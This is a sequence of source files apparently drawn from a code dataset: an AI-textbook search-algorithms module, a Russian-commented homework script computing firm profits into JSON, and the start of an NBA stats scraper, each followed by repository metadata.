if problem.goal_test(node.state):
return node
explored.add(node.state)
frontier.extend(child for child in node.expand(problem)
if child.state not in explored and
child not in frontier)
return None
def breadth_first_tree_search(problem):
"""Search the shallowest nodes in the search tree first."""
return tree_search(problem, FIFOQueue())
def depth_first_tree_search(problem):
"""Search the deepest nodes in the search tree first."""
return tree_search(problem, Stack())
def depth_first_graph_search(problem):
"""Search the deepest nodes in the search tree first."""
return graph_search(problem, Stack())
def breadth_first_search(problem):
"""[Figure 3.11]"""
node = Node(problem.initial)
if problem.goal_test(node.state):
return node
frontier = FIFOQueue()
frontier.append(node)
explored = set()
while frontier:
node = frontier.pop()
explored.add(node.state)
for child in node.expand(problem):
if child.state not in explored and child not in frontier:
if problem.goal_test(child.state):
return child
frontier.append(child)
return None
def best_first_graph_search(problem, f):
"""Search the nodes with the lowest f scores first.
You specify the function f(node) that you want to minimize; for example,
if f is a heuristic estimate to the goal, then we have greedy best
first search; if f is node.depth then we have breadth-first search.
There is a subtlety: the line "f = memoize(f, 'f')" means that the f
values will be cached on the nodes as they are computed. So after doing
a best first search you can examine the f values of the path returned."""
f = memoize(f, 'f')
node = Node(problem.initial)
if problem.goal_test(node.state):
return node
frontier = PriorityQueue(min, f)
frontier.append(node)
explored = set()
while frontier:
node = frontier.pop()
if problem.goal_test(node.state):
return node
explored.add(node.state)
for child in node.expand(problem):
if child.state not in explored and child not in frontier:
frontier.append(child)
elif child in frontier:
incumbent = frontier[child]
if f(child) < f(incumbent):
del frontier[incumbent]
frontier.append(child)
return None
def uniform_cost_search(problem):
"""[Figure 3.14]"""
return best_first_graph_search(problem, lambda node: node.path_cost)
def depth_limited_search(problem, limit=50):
"""[Figure 3.17]"""
def recursive_dls(node, problem, limit):
if problem.goal_test(node.state):
return node
elif limit == 0:
return 'cutoff'
else:
cutoff_occurred = False
for child in node.expand(problem):
result = recursive_dls(child, problem, limit - 1)
if result == 'cutoff':
cutoff_occurred = True
elif result is not None:
return result
return 'cutoff' if cutoff_occurred else None
# Body of depth_limited_search:
return recursive_dls(Node(problem.initial), problem, limit)
def iterative_deepening_search(problem):
"""[Figure 3.18]"""
for depth in range(sys.maxsize):
result = depth_limited_search(problem, depth)
if result != 'cutoff':
return result
# ______________________________________________________________________________
# Bidirectional Search
# Pseudocode from https://webdocs.cs.ualberta.ca/%7Eholte/Publications/MM-AAAI2016.pdf
def bidirectional_search(problem):
e = problem.find_min_edge()
gF, gB = {problem.initial : 0}, {problem.goal : 0}
openF, openB = [problem.initial], [problem.goal]
closedF, closedB = [], []
U = infinity
def extend(U, open_dir, open_other, g_dir, g_other, closed_dir):
"""Extend search in given direction"""
n = find_key(C, open_dir, g_dir)
open_dir.remove(n)
closed_dir.append(n)
for c in problem.actions(n):
if c in open_dir or c in closed_dir:
if g_dir[c] <= problem.path_cost(g_dir[n], n, None, c):
continue
open_dir.remove(c)
g_dir[c] = problem.path_cost(g_dir[n], n, None, c)
open_dir.append(c)
if c in open_other:
U = min(U, g_dir[c] + g_other[c])
return U, open_dir, closed_dir, g_dir
def find_min(open_dir, g):
"""Finds minimum priority, g and f values in open_dir"""
m, m_f = infinity, infinity
for n in open_dir:
f = g[n] + problem.h(n)
pr = max(f, 2*g[n])
m = min(m, pr)
m_f = min(m_f, f)
return m, m_f, min(g.values())
def find_key(pr_min, open_dir, g):
"""Finds key in open_dir with value equal to pr_min
and minimum g value."""
m = infinity
state = -1
for n in open_dir:
pr = max(g[n] + problem.h(n), 2*g[n])
if pr == pr_min:
if g[n] < m:
m = g[n]
state = n
return state
while openF and openB:
pr_min_f, f_min_f, g_min_f = find_min(openF, gF)
pr_min_b, f_min_b, g_min_b = find_min(openB, gB)
C = min(pr_min_f, pr_min_b)
if U <= max(C, f_min_f, f_min_b, g_min_f + g_min_b + e):
return U
if C == pr_min_f:
# Extend forward
U, openF, closedF, gF = extend(U, openF, openB, gF, gB, closedF)
else:
# Extend backward
U, openB, closedB, gB = extend(U, openB, openF, gB, gF, closedB)
return infinity
# ______________________________________________________________________________
# Informed (Heuristic) Search
greedy_best_first_graph_search = best_first_graph_search
# Greedy best-first search is accomplished by specifying f(n) = h(n).
def astar_search(problem, h=None):
"""A* search is best-first graph search with f(n) = g(n)+h(n).
You need to specify the h function when you call astar_search, or
else in your Problem subclass."""
h = memoize(h or problem.h, 'h')
return best_first_graph_search(problem, lambda n: n.path_cost + h(n))
def greedy_search(problem, h=None):
"""f(n) = h(n)"""
h = memoize(h or problem.h, 'h')
return best_first_graph_search(problem, h)
# ______________________________________________________________________________
# Other search algorithms
def recursive_best_first_search(problem, h=None):
"""[Figure 3.26]"""
h = memoize(h or problem.h, 'h')
def RBFS(problem, node, flimit):
if problem.goal_test(node.state):
return node, 0 # (The second value is immaterial)
successors = node.expand(problem)
if len(successors) == 0:
return None, infinity
for s in successors:
s.f = max(s.path_cost + h(s), node.f)
while True:
# Order by lowest f value
successors.sort(key=lambda x: x.f)
best = successors[0]
if best.f > flimit:
return None, best.f
if len(successors) > 1:
alternative = successors[1].f
else:
alternative = infinity
result, best.f = RBFS(problem, best, min(flimit, alternative))
if result is not None:
return result, best.f
node = Node(problem.initial)
node.f = h(node)
result, bestf = RBFS(problem, node, infinity)
return result
def hill_climbing(problem):
"""From the initial node, keep choosing the neighbor with highest value,
stopping when no neighbor is better. [Figure 4.2]"""
current = Node(problem.initial)
while True:
neighbors = current.expand(problem)
if not neighbors:
break
neighbor = argmax_random_tie(neighbors,
key=lambda node: problem.value(node.state))
if problem.value(neighbor.state) <= problem.value(current.state):
break
current = neighbor
return current.state
def exp_schedule(k=20, lam=0.005, limit=100):
"""One possible schedule function for simulated annealing"""
return lambda t: (k * math.exp(-lam * t) if t < limit else 0)
def simulated_annealing(problem, schedule=exp_schedule()):
"""[Figure 4.5] CAUTION: This differs from the pseudocode as it
returns a state instead of a Node."""
current = Node(problem.initial)
for t in range(sys.maxsize):
T = schedule(t)
if T == 0:
return current.state
neighbors = current.expand(problem)
if not neighbors:
return current.state
next = random.choice(neighbors)
delta_e = problem.value(next.state) - problem.value(current.state)
if delta_e > 0 or probability(math.exp(delta_e / T)):
current = next
def and_or_graph_search(problem):
"""[Figure 4.11]Used when the environment is nondeterministic and completely observable.
Contains OR nodes where the agent is free to choose any action.
After every action there is an AND node which contains all possible states
the agent may reach due to stochastic nature of environment.
The agent must be able to handle all possible states of the AND node (as it
may end up in any of them).
Returns a conditional plan to reach goal state,
or failure if the former is not possible."""
# functions used by and_or_search
def or_search(state, problem, path):
"""returns a plan as a list of actions"""
if problem.goal_test(state):
return []
if state in path:
return None
for action in problem.actions(state):
plan = and_search(problem.result(state, action),
problem, path + [state, ])
if plan is not None:
return [action, plan]
def and_search(states, problem, path):
"""Returns plan in form of dictionary where we take action plan[s] if we reach state s."""
plan = {}
for s in states:
plan[s] = or_search(s, problem, path)
if plan[s] is None:
return None
return plan
# body of and or search
return or_search(problem.initial, problem, [])
class PeakFindingProblem(Problem):
"""Problem of finding the highest peak in a limited grid"""
def __init__(self, initial, grid):
"""The grid is a 2 dimensional array/list whose state is specified by tuple of indices"""
Problem.__init__(self, initial)
self.grid = grid
self.n = len(grid)
assert self.n > 0
self.m = len(grid[0])
assert self.m > 0
def actions(self, state):
"""Allows movement in only 4 directions"""
# TODO: Add flag to allow diagonal motion
allowed_actions = []
if state[0] > 0:
allowed_actions.append('N')
if state[0] < self.n - 1:
allowed_actions.append('S')
if state[1] > 0:
allowed_actions.append('W')
if state[1] < self.m - 1:
allowed_actions.append('E')
return allowed_actions
def result(self, state, action):
"""Moves in the direction specified by action"""
x, y = state
x = x + (1 if action == 'S' else (-1 if action == 'N' else 0))
y = y + (1 if action == 'E' else (-1 if action == 'W' else 0))
return (x, y)
def value(self, state):
"""Value of a state is the value it is the index to"""
x, y = state
assert 0 <= x < self.n
assert 0 <= y < self.m
return self.grid[x][y]
class OnlineDFSAgent:
"""[Figure 4.21] The abstract class for an OnlineDFSAgent. Override
update_state method to convert percept to state. While initializing
the subclass a problem needs to be provided which is an instance of
a subclass of the Problem class."""
def __init__(self, problem):
self.problem = problem
self.s = None
self.a = None
self.untried = defaultdict(list)
self.unbacktracked = defaultdict(list)
self.result = {}
def __call__(self, percept):
s1 = self.update_state(percept)
if self.problem.goal_test(s1):
self.a = None
else:
if s1 not in self.untried.keys():
self.untried[s1] = self.problem.actions(s1)
if self.s is not None:
if s1 != self.result[(self.s, self.a)]:
self.result[(self.s, self.a)] = s1
self.unbacktracked[s1].insert(0, self.s)
if len(self.untried[s1]) == 0:
if len(self.unbacktracked[s1]) == 0:
self.a = None
else:
# else a <- an action b such that result[s', b] = POP(unbacktracked[s'])
unbacktracked_pop = self.unbacktracked[s1].pop(0)
for (s, b) in self.result.keys():
if self.result[(s, b)] == unbacktracked_pop:
self.a = b
break
else:
self.a = self.untried[s1].pop(0)
self.s = s1
return self.a
def update_state(self, percept):
"""To be overridden in most cases. The default case
assumes the percept to be of type state."""
return percept
# ______________________________________________________________________________
class OnlineSearchProblem(Problem):
"""
A problem which is solved by an agent executing
actions, rather than by just computation.
Carried in a deterministic and a fully observable environment."""
def __init__(self, initial, goal, graph):
self.initial = initial
self.goal = goal
self.graph = graph
def actions(self, state):
return self.graph.dict[state].keys()
def output(self, state, action):
return self.graph.dict[state][action]
def h(self, state):
"""Returns least possible cost to reach a goal for the given state."""
return self.graph.least_costs[state]
def c(self, s, a, s1):
"""Returns a cost estimate for an agent to move from state 's' to state 's1'."""
return 1
def update_state(self, percept):
raise NotImplementedError
def goal_test(self, state):
if state == self.goal:
return True
return False
class LRTAStarAgent:
""" [Figure 4.24]
Abstract class for LRTA*-Agent. A problem needs to be
provided which is an instanace of a subclass of Problem Class.
Takes a OnlineSearchProblem [Figure 4.23] as a problem.
"""
def __init__(self, problem):
self.problem = problem
# self.result = {} # no need as we are using problem.result
self.H = {}
self.s = None
self.a = None
def __call__(self, s1): # as of now s1 is a state rather than a percept
if self.problem.goal_test(s1):
self.a = None
return self.a
else:
if s1 not in self.H:
self.H[s1] = self.problem.h(s1)
if self.s is not None:
# self.result[(self.s, self.a)] = s1 # no need as we are using problem.output
# minimum cost for action b in problem.actions(s)
self.H[self.s] = min(self.LRTA_cost(self.s, b, self.problem.output(self.s, b),
self.H) for b in self.problem.actions(self.s))
# an action b in problem.actions(s1) that minimizes costs
self.a = argmin(self.problem.actions(s1),
key=lambda b: self.LRTA_cost(s1, b, self.problem.output(s1, b), self.H))
self.s = s1
return self.a
def LRTA_cost(self, s, a, s1, H):
"""Returns cost to move from state 's' to state 's1' plus
estimated cost to get to goal from s1."""
print(s, a, s1)
if s1 is None:
return self.problem.h(s)
else:
# sometimes we need to get H[s1] which we haven't yet added to H
# to replace this try, except: we can initialize H with values from problem.h
try:
return self.problem.c(s, a, s1) + self.H[s1]
except:
return self.problem.c(s, a, s1) + self.problem.h(s1)
# ______________________________________________________________________________
# Genetic Algorithm
def genetic_search(problem, fitness_fn, ngen=1000, pmut=0.1, n=20):
"""Call genetic_algorithm on the appropriate parts of a problem.
This requires the problem to have states that can mate and mutate,
plus a value method that scores states."""
# NOTE: This is not tested and might not work.
# TODO: Use this function to make Problems work with genetic_algorithm.
s = problem.initial_state
states = [problem.result(s, a) for a in problem.actions(s)]
random.shuffle(states)
return genetic_algorithm(states[:n], problem.value, ngen, pmut)
def genetic_algorithm(population, fitness_fn, gene_pool=[0, 1], f_thres=None, ngen=1000, pmut=0.1): # noqa
"""[Figure 4.8]"""
for i in range(ngen):
new_population = []
random_selection = selection_chances(fitness_fn, population)
for j in range(len(population)):
x = random_selection()
y = random_selection()
child = reproduce(x, y)
if random.uniform(0, 1) < pmut:
child = mutate(child, gene_pool)
new_population.append(child)
population = new_population
if f_thres:
fittest_individual = argmax(population, key=fitness_fn)
if fitness_fn(fittest_individual) >= f_thres:
return fittest_individual
return argmax(population, key=fitness_fn)
def init_population(pop_number, gene_pool, state_length):
"""Initializes population for genetic algorithm
pop_number : Number of individuals in population
gene_pool : List of possible values for individuals
state_length: The length of each individual"""
g = len(gene_pool)
population = []
for i in range(pop_number):
new_individual = [gene_pool[random.randrange(0, g)] for j in range(state_length)]
population.append(new_individual)
return population
def selection_chances(fitness_fn, population):
fitnesses = map(fitness_fn, population)
return weighted_sampler(population, fitnesses)
def reproduce(x, y):
n = len(x)
c = random.randrange(1, n)
return x[:c] + y[c:]
def mutate(x, gene_pool):
n = len(x)
g = len(gene_pool)
c = random.randrange(0, n)
r = random.randrange(0, g)
new_gene = gene_pool[r]
return x[:c] + [new_gene] + x[c+1:]
# _____________________________________________________________________________
# The remainder of this file implements examples for the search algorithms.
# ______________________________________________________________________________
# Graphs and Graph Problems
class Graph:
"""A graph connects nodes (verticies) by edges (links). Each edge can also
have a length associated with it. The constructor call is something like:
g = Graph({'A': {'B': 1, 'C': 2})
this makes a graph with 3 nodes, A, B, and C, with an edge of length 1 from
A to B, and an edge of length 2 from A to C. You can also do:
g = Graph({'A': {'B': 1, 'C': 2}, directed=False)
This makes an undirected graph, so inverse links are also added. The graph
stays undirected; if you add more links with g.connect('B', 'C', 3), then
inverse link is also added. You can use g.nodes() to get a list of nodes,
g.get('A') to get a dict of links out of A, and g.get('A', 'B') to get the
length of the link from A to B. 'Lengths' can actually be any object at
all, and nodes can be any hashable object."""
def __init__(self, dict=None, directed=True):
self.dict = dict or {}
self.directed = directed
if not directed:
self.make_undirected()
def make_undirected(self):
"""Make a digraph into an undirected graph by adding symmetric edges."""
for a in list(self.dict.keys()):
for (b, dist) in self.dict[a].items():
self.connect1(b, a, dist)
def connect(self, A, B, distance=1):
"""Add a link from A and B of given distance, and also add the inverse
link if the graph is undirected."""
self.connect1(A, B, distance)
if not self.directed:
self.connect1(B, A, distance)
def connect1(self, A, B, distance):
"""Add a link from A to B of given distance, in one direction only."""
self.dict.setdefault(A, {})[B] = distance
def get(self, a, b=None):
"""Return a link distance or a dict of {node: distance} entries.
.get(a,b) returns the distance or None;
.get(a) returns a dict of {node: distance} entries, possibly {}."""
links = self.dict.setdefault(a, {})
if b is None:
return links
else:
return links.get(b)
def nodes(self):
"""Return a list of nodes in the graph."""
return list(self.dict.keys())
def UndirectedGraph(dict=None):
"""Build a Graph where every edge (including future ones) goes both ways."""
return Graph(dict=dict, directed=False)
def RandomGraph(nodes=list(range(10)), min_links=2, width=400, height=300,
curvature=lambda: random.uniform(1.1, 1.5)):
"""Construct a random graph, with the specified nodes, and random links.
The nodes are laid out randomly on a (width x height) rectangle.
Then each node is connected to the min_links nearest neighbors.
Because inverse links are added, some nodes will have more connections.
The distance between nodes is the hypotenuse times curvature(),
where curvature() defaults to a random number between 1.1 and 1.5."""
g = UndirectedGraph()
g.locations = {}
# Build the cities
for node in nodes:
g.locations[node] = (random.randrange(width), random.randrange(height))
# Build roads from each city to at least min_links nearest neighbors.
for i in range(min_links):
for node in nodes:
if len(g.get(node)) < min_links:
here = g.locations[node]
def distance_to_node(n):
if n is node or g.get(node, n):
return infinity
return distance(g.locations[n], here)
neighbor = argmin(nodes, key=distance_to_node)
d = distance(g.locations[neighbor], here) * curvature()
g.connect(node, neighbor, int(d))
return g
""" [Figure 3.2]
Simplified road map of Romania
"""
romania_map = UndirectedGraph(dict(
Arad=dict(Zerind=75, Sibiu=140, Timisoara=118),
Bucharest=dict(Urziceni=85, Pitesti=101, Giurgiu=90, Fagaras=211),
Craiova=dict(Drobeta=120, Rimnicu=146, Pitesti=138),
Drobeta=dict(Mehadia=75),
Eforie=dict(Hirsova=86),
Fagaras=dict(Sibiu=99),
Hirsova=dict(Urziceni=98),
Iasi=dict(Vaslui=92, Neamt=87),
Lugoj=dict(Timisoara=111, Mehadia=70),
Oradea=dict(Zerind=71, Sibiu=151),
Pitesti=dict(Rimnicu=97),
Rimnicu=dict(Sibiu=80),
Urziceni=dict(Vaslui=142)))
romania_map.locations = dict(
Arad=(91, 492), Bucharest=(400, 327), Craiova=(253, 288),
Drobeta=(165, 299), Eforie=(562, 293), Fagaras=(305, 449),
Giurgiu=(375, 270), Hirsova=(534, 350), Iasi=(473, 506),
Lugoj=(165, 379), Mehadia=(168, 339), Neamt=(406, 537),
Oradea=(131, 571), Pitesti=(320, 368), Rimnicu=(233, 410),
Sibiu=(207, 457), Timisoara=(94, 410), Urziceni=(456, 350),
Vaslui=(509, 444), Zerind=(108, 531))
""" [Figure 4.9]
Eight possible states of the vacumm world
Each state is represented as
* "State of the left room" "State of the right room" "Room in which the agent
is present"
1 - DDL Dirty Dirty Left
2 - DDR Dirty Dirty Right
3 - DCL Dirty Clean Left
4 - DCR Dirty Clean Right
5 - CDL Clean Dirty Left
6 - CDR Clean Dirty Right
7 - CCL Clean Clean Left
8 - CCR Clean Clean Right
"""
vacumm_world = Graph(dict(
State_1=dict(Suck=['State_7', 'State_5'], Right=['State_2']),
State_2=dict(Suck=['State_8', 'State_4'], Left=['State_2']),
State_3=dict(Suck=['State_7'], Right=['State_4']),
State_4=dict(Suck=['State_4', 'State_2'], Left=['State_3']),
State_5=dict(Suck=['State_5', 'State_1'], Right=['State_6']),
State_6=dict(Suck=['State_8'], Left=['State_5']),
State_7=dict(Suck=['State_7', 'State_3'], Right=['State_8']),
State_8=dict(Suck=['State_8', 'State_6'], Left=['State_7'])
))
""" [Figure 4.23]
One-dimensional state space Graph
"""
one_dim_state_space = Graph(dict(
State_1=dict(Right='State_2'),
State_2=dict(Right='State_3', Left='State_1'),
State_3=dict(Right='State_4', Left='State_2'),
State_4=dict(Right='State_5', Left='State_3'),
State_5=dict(Right='State_6', Left='State_4'),
State_6=dict(Left='State_5')
))
one_dim_state_space.least_costs = dict(
State_1=8,
State_2=9,
State_3=2,
State_4=2,
State_5=4,
State_6=3)
""" [Figure 6.1]
Principal states and territories of Australia
"""
australia_map = UndirectedGraph(dict(
T=dict(),
SA=dict(WA=1, NT=1, Q=1, NSW=1, V=1),
NT=dict(WA=1, Q=1),
NSW=dict(Q=1, V=1)))
australia_map.locations = dict(WA=(120, 24), NT=(135, 20), SA=(135, 30),
Q=(145, 20), NSW=(145, 32), T=(145, 42),
V=(145, 37))
class GraphProblem(Problem):
"""The problem of searching a graph from one node to another."""
def __init__(self, initial, goal, graph):
Problem.__init__(self, initial, goal)
self.graph = graph
def actions(self, A):
"""The actions at a graph node are just its neighbors."""
return list(self.graph.get(A).keys())
def result(self, state, action):
"""The result of going to a neighbor is just that neighbor."""
return action
def path_cost(self, cost_so_far, A, action, B):
return cost_so_far + (self.graph.get(A, B) or infinity)
def find_min_edge(self):
"""Find minimum value of edges."""
m = infinity
for d in self.graph.dict.values():
local_min = min(d.values())
m = min(m, local_min)
return m
def h(self, node):
"""h function is straight-line distance from a node's state to goal."""
locs = getattr(self.graph, 'locations', None)
if locs:
if type(node) is str:
return int(distance(locs[node], locs[self.goal]))
return int(distance(locs[node.state], locs[self.goal]))
else:
return infinity
class GraphProblemStochastic(GraphProblem):
"""
A version of GraphProblem where an action can lead to
nondeterministic output i.e. multiple possible states.
Define the graph as dict(A = dict(Action = [[<Result 1>, <Result 2>, ...], <cost>], ...), ...)
A the dictionary format is different, make sure the graph is created as a directed graph.
"""
def result(self, state, action):
return self.graph.get(state, action)
def path_cost(self):
raise NotImplementedError
# ______________________________________________________________________________
class NQueensProblem(Problem):
"""The problem of placing N queens on an NxN board with none attacking
each other. A state is represented as an N-element array, where
a value of r in the c-th entry means there is a queen at column c,
row r, and a value of None means that the c-th column has not been
filled in yet. We fill in columns left to right.
>>> depth_first_tree_search(NQueensProblem(8))
<Node [7, 3, 0, 2, 5, 1, 6, 4]>
"""
def __init__(self, N):
self.N = N
self.initial = [None] * N
def actions(self, state):
"""In the leftmost empty column, try all non-conflicting rows."""
if state[-1] is not None:
return [] # All columns filled; no successors
else:
col = state.index(None)
return [row for row in range(self.N)
if not self.conflicted(state, row, col)]
def result(self, state, row):
"""Place the next queen at the given row."""
col = state.index(None)
new = state[:]
new[col] = row
return new
def conflicted(self, state, row, col):
"""Would placing a queen at (row, col) conflict with anything?"""
return any(self.conflict(row, col, state[c], c)
for c in range(col))
def conflict(self, row1, col1, row2, col2):
"""Would putting two queens in (row1, col1) and (row2, col2) conflict?"""
return (row1 == row2 or # same row
col1 == col2 or # same column
row1 - col1 == row2 - col2 or # same \ diagonal
row1 + col1 == row2 + col2) # same / diagonal
def goal_test(self, state):
"""Check if all columns filled, no conflicts."""
if state[-1] is None:
return False
return not any(self.conflicted(state, state[col], col)
for col in range(len(state)))
# ______________________________________________________________________________
# Inverse Boggle: Search for a high-scoring Boggle board. A good domain for
# iterative-repair and related search techniques, as suggested by Justin Boyan.
ALPHABET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
cubes16 = ['FORIXB', 'MOQABJ', 'GURILW', 'SETUPL',
'CMPDAE', 'ACITAO', 'SLCRAE', 'ROMASH',
'NODESW', 'HEFIYE', 'ONUDTK', 'TEVIGN',
'ANEDVZ', 'PINESH', 'ABILYT', 'GKYLEU']
def random_boggle(n=4):
"""Return a random Boggle board of size n x n.
We represent a board as a linear list of letters."""
cubes = [cubes16[i % 16] for i in range(n * n)]
random.shuffle(cubes)
return list(map(random.choice, cubes))
# The best 5x5 board found by Boyan, with our word list this board scores
# 2274 words, for a score of 9837
boyan_best = list('RSTCSDEIAEGNLRPEATESMSSID')
def print_boggle(board):
"""Print the board in a 2-d array."""
n2 = len(board)
n = exact_sqrt(n2)
for i in range(n2):
if i % n == 0 and i > 0:
print()
if board[i] == 'Q':
print('Qu', end=' ')
else:
print(str(board[i]) + ' ', end=' ')
print()
def boggle_neighbors(n2, cache={}):
"""Return a list of lists, where the i-th element is the list of indexes
for the neighbors of square i."""
if cache.get(n2):
return cache.get(n2)
n = exact_sqrt(n2)
neighbors = [None] * n2
for i in range(n2):
neighbors[i] = []
on_top = i < n
on_bottom = i >= n2 - n
on_left = i % n == 0
on_right = (i+1) % n == 0
if not on_top:
neighbors[i].append(i - n)
if not on_left:
neighbors[i].append(i - n - 1)
if not on_right:
neighbors[i].append(i - n + 1)
if not on_bottom:
neighbors[i].append(i + n)
if not on_left:
neighbors[i].append(i + n - 1)
if not on_right:
neighbors[i].append(i + n + 1)
if not on_left:
neighbors[i].append(i - 1)
if not on_right:
neighbors[i].append(i + 1)
cache[n2] = neighbors
return neighbors
def exact_sqrt(n2):
"""If n2 is a perfect square, return its square root, else raise error."""
n = int(math.sqrt(n2))
assert n * n == n2
return n
# _____________________________________________________________________________
class Wordlist:
"""This class holds a list of words. You can use (word in wordlist)
to check if a word is in the list, or wordlist.lookup(prefix)
to see if prefix starts any of the words in the list."""
def __init__(self, file, min_len=3):
lines = file.read().upper().split()
self.words = [word for word in lines if len(word) >= min_len]
self.words.sort()
self.bounds = {}
for c in ALPHABET:
c2 = chr(ord(c) + 1)
self.bounds[c] = (bisect.bisect(self.words, c),
bisect.bisect(self.words, c2))
def lookup(self, prefix, lo=0, hi=None):
"""See if prefix is in dictionary, as a full word or as a prefix.
Return two values: the first is the lowest i such that
words[i].startswith(prefix), or is None; the second is
True iff prefix itself is in the Wordlist."""
words = self.words
if hi is None:
hi = len(words)
i = bisect.bisect_left(words, prefix, lo, hi)
if i < len(words) and words[i].startswith(prefix):
return i, (words[i] == prefix)
else:
return None, False
def __contains__(self, word):
return self.lookup(word)[1]
def __len__(self):
return len(self.words)
# _____________________________________________________________________________
class BoggleFinder:
"""A class that allows you to find all the words in a Boggle board."""
wordlist = None # A class variable, holding a wordlist
def __init__(self, board=None):
if BoggleFinder.wordlist is None:
BoggleFinder.wordlist = Wordlist(open_data("EN-text/wordlist.txt"))
self.found = {}
if board:
self.set_board(board)
def set_board(self, board=None):
"""Set the board, and find all the words in it."""
if board is None:
board = random_boggle()
self.board = board
self.neighbors = boggle_neighbors(len(board))
self.found = {}
for i in range(len(board)):
lo, hi = self.wordlist.bounds[board[i]]
self.find(lo, hi, i, [], '')
return self
def find(self, lo, hi, i, visited, prefix):
"""Looking in square i, find the words that continue the prefix,
considering the entries in self.wordlist.words[lo:hi], and not
revisiting the squares in visited."""
if i in visited:
return
wordpos, is_word = self.wordlist.lookup(prefix, lo, hi)
if wordpos is not None:
if is_word:
self.found[prefix] = True
visited.append(i)
c = self.board[i]
if c == 'Q':
c = 'QU'
prefix += c
for j in self.neighbors[i]:
self.find(wordpos, hi, j, visited, prefix)
visited.pop()
def words(self):
"""The words found."""
return list(self.found.keys())
scores = [0, 0, 0, 0, 1, 2, 3, 5] + [11] * 100
def score(self):
"""The total score for the words found, according to the rules."""
return sum([self.scores[len(w)] for w in self.words()])
def __len__(self):
"""The number of words found."""
return len(self.found)
# _____________________________________________________________________________
def boggle_hill_climbing(board=None, ntimes=100, verbose=True):
"""Solve inverse Boggle by hill-climbing: find a high-scoring board by
starting with a random one and changing it."""
finder = BoggleFinder()
if board is None:
board = random_boggle()
best = len(finder.set_board(board))
for _ in range(ntimes):
i, oldc = mutate_boggle(board)
new = len(finder.set_board(board))
if new > best:
best = new
if verbose:
print(best, _, board)
else:
board[i] = oldc # Change back
if verbose:
print_boggle(board)
return board, best
def mutate_boggle(board):
i = random.randrange(len(board))
oldc = board[i]
# random.choice(boyan_best)
board[i] = random.choice(random.choice(cubes16))
return i, oldc
# ______________________________________________________________________________
# Code to compare searchers on various problems.
class InstrumentedProblem(Problem):
"""Delegates to a problem, and keeps statistics."""
def __init__(self, problem):
self.problem = problem
self.succs = self.goal_tests = self.states = 0
self.found = None
def actions(self, state):
self.succs += 1
return self.problem.actions(state)
def result(self, state, action):
self.states += 1
return self.problem.result(state, action)
def goal_test(self, state):
self.goal_tests += 1
result = self.problem.goal_test(state)
if result:
self.found = state
return result
def path_cost(self, c, state1, action, state2):
return self.problem.path_cost(c, state1, action, state2)
def value(self, state):
return self.problem.value(state)
def __getattr__(self, attr):
return getattr(self.problem, attr)
def __repr__(self):
return '<{:4d}/{:4d}/{:4d}/{}>'.format(self.succs, self.goal_tests,
self.states, str(self.found)[:4])
def compare_searchers(problems, header,
searchers=[breadth_first_tree_search,
breadth_first_search,
depth_first_graph_search,
iterative_deepening_search,
depth_limited_search,
recursive_best_first_search]):
def do(searcher, problem):
p = InstrumentedProblem(problem)
searcher(p)
return p
table = [[name(s)] + [do(s, p) for p in problems] for s in searchers]
print_table(table, header)
def compare_graph_searchers():
"""Prints a table of search results."""
compare_searchers(problems=[GraphProblem('Arad', 'Bucharest', romania_map),
GraphProblem('Oradea', 'Neamt', romania_map),
GraphProblem('Q', 'WA', australia_map)],
header=['Searcher', 'romania_map(Arad, Bucharest)',
'romania_map(Oradea, Neamt)', 'australia_map'])
|
[
"tiagovcsoares@gmail.com"
] |
tiagovcsoares@gmail.com
|
3d1830d5bdc9a6ab4ef260b8c4c6114239a72d8d
|
4f15586a6244a5c985d3a3dfe048a2c6e6bdcb62
|
/L5/hw5_t7.py
|
7305814c6c6d77eb53f51113c43afd55eb23c690
|
[] |
no_license
|
irina-rus/Geekbrains
|
4fcf1303e7e8ac6ad022d7b5cea2d9bd394a2ec0
|
c63c76c7cf5e43b9a7acd8edac251b845c44e024
|
refs/heads/main
| 2023-01-24T14:00:36.812112
| 2020-11-30T12:31:58
| 2020-11-30T12:31:58
| 309,063,437
| 0
| 0
| null | 2020-11-30T12:31:59
| 2020-11-01T09:38:23
|
Python
|
UTF-8
|
Python
| false
| false
| 2,214
|
py
|
#Создать вручную и заполнить несколькими строками текстовый файл, в котором каждая строка должна содержать
# данные о фирме: название, форма собственности, выручка, издержки.
#Пример строки файла: firm_1 ООО 10000 5000.
#Необходимо построчно прочитать файл, вычислить прибыль каждой компании, а также среднюю прибыль.
# Если фирма получила убытки, в расчет средней прибыли ее не включать.
#Далее реализовать список. Он должен содержать словарь с фирмами и их прибылями, а также словарь со средней прибылью.
# Если фирма получила убытки, также добавить ее в словарь (со значением убытков).
#Пример списка: [{“firm_1”: 5000, “firm_2”: 3000, “firm_3”: 1000}, {“average_profit”: 2000}].
#Итоговый список сохранить в виде json-объекта в соответствующий файл.
#Пример json-объекта:
#[{"firm_1": 5000, "firm_2": 3000, "firm_3": 1000}, {"average_profit": 2000}]
#Подсказка: использовать менеджер контекста.
with open("file_5_7.txt", "r", encoding="UTF-8") as file:
for line in file:
print(line)
import json
profit = {}
pr = {}
p = 0
prof_aver = 0
i = 0
with open("file_5_7.txt", "r") as file:
for line in file:
name, firm, revenue, loss = line.split()
profit[name] = int(revenue) - int(loss)
if profit.setdefault(name) >= 0:
p = p + profit.setdefault(name)
i += 1
if i != 0:
prof_aver = p / i
pr = {'average profit': round(prof_aver)}
profit.update(pr)
print(f'Firms profit: {profit}')
with open("file_5_7.json", "w") as write_js:
json.dump(profit, write_js)
js_str = json.dumps(profit)
print(f'json file: {js_str}')
|
[
"irinakostiukhina@gmail.com"
] |
irinakostiukhina@gmail.com
|
3e36db025300c5138304afcafd13faa606c1afac
|
5a00bbd360532af1d56782aaa4294c3760b75d5f
|
/main.py
|
e88ae465b5a890cdd5c4b3716e4e4c4cdc27bd82
|
[] |
no_license
|
sharkoe/NBA
|
13972ec789210784506688f313cc3f4aa2a88c8c
|
7e34cb6cb19b666ab1b662e4f0813e041d458c17
|
refs/heads/master
| 2023-05-17T18:46:33.442751
| 2021-05-25T19:28:34
| 2021-05-25T19:28:34
| 370,447,925
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,536
|
py
|
from package import *
import sys
import os
def main(url):
print('Starting scrapper... \n')
# create a soup table
data_table = datascraper.get_first_table(url) # this will select the table on the site
print('URL pull complete. \n')
# select these names of the columns based on the header table
column_names = datascraper.list_of_headers(data_table)
# create data frame from the website table
final_data_frame = datascraper.create_df(soup_table=data_table, list_of_column_names=column_names)
print('Data Table complete. \n')
# do you want to save the data frame to excel workbook?
